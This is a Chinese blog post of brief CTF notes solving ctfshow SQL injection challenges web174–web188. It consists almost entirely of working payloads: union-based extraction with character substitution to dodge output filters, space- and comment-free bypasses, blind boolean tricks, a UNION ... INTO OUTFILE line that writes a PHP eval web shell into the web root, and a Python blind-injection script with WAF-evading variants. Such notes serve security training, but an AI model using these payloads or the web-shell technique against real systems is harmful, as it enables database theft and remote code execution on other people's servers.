SQL注入零散记录

admin 2022年1月5日22:56:05CTF专场评论11 views2031字阅读6分46秒阅读模式

>

>

SQL注入零散记录

hdxw

做到哪算哪

web174

0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23

flaq{khhefafn-mnnb-lbfn-picc-hnledpbohekq}
flag{300efaf6-566b-4bf6-81cc-064ed8b70e39}

0' union select 1,'<?php eval($_POST["5"]);?>' into outfile '/var/www/html/eval.php' %23

不过滤输入过滤输出,都可盲注

web176

不知道为什么

0' or 1%23

web177/web178/web179

貌似不能有空格

1'||1%23

web180/web181

1'    报错说明单引号可用
1'%23    无数据,说明#被拦截了,其他截断的也不行
1'||'1    那就不绕了,直接引号闭合,但是被limit 1了
0'||username='flag   修改返回结果直接getflag

web182

0'||substr(username,1,1)='f
0'||username<'g'%26%26username>'f
0'||username<'flah'%26%26username>'flaf
0'||id='26

web183-188

flag = ""
for i in range(len(flag)+1,50):
    llll = len(flag)
    for s in "0123456789-abcdefgl{}":
        # {'tableName':"`ctfshow_user`where`id`>21&&!(mid(pass,%s,1)<>'%s')"%(i,s)} // user_count = 1;
        # {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,1)<>char(%s))"%(i,ord(s))} //user_count = 42; 或可 ASCII
        # {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,length(database())/length(database()))<>char(%s))"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} //user_count = 42;
        # {'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} // "user_count = 484;" not in
        # md5($_POST['password'],true); admin/e58
        # username/0 或者 1||1
        r = requests.post("http://b75c1072-6b76-4d93-9787-5a3aa91db533.chall.ctf.show/select-waf.php",data={'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])})
        t = r.text
        # print(t)
        if "user_count = 484;" not in t:
            flag += s
            print(flag)
            break
    # break
    if "}" in flag or llll == len(flag):
        break

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日22:56:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SQL注入零散记录 http://cn-sec.com/archives/719565.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: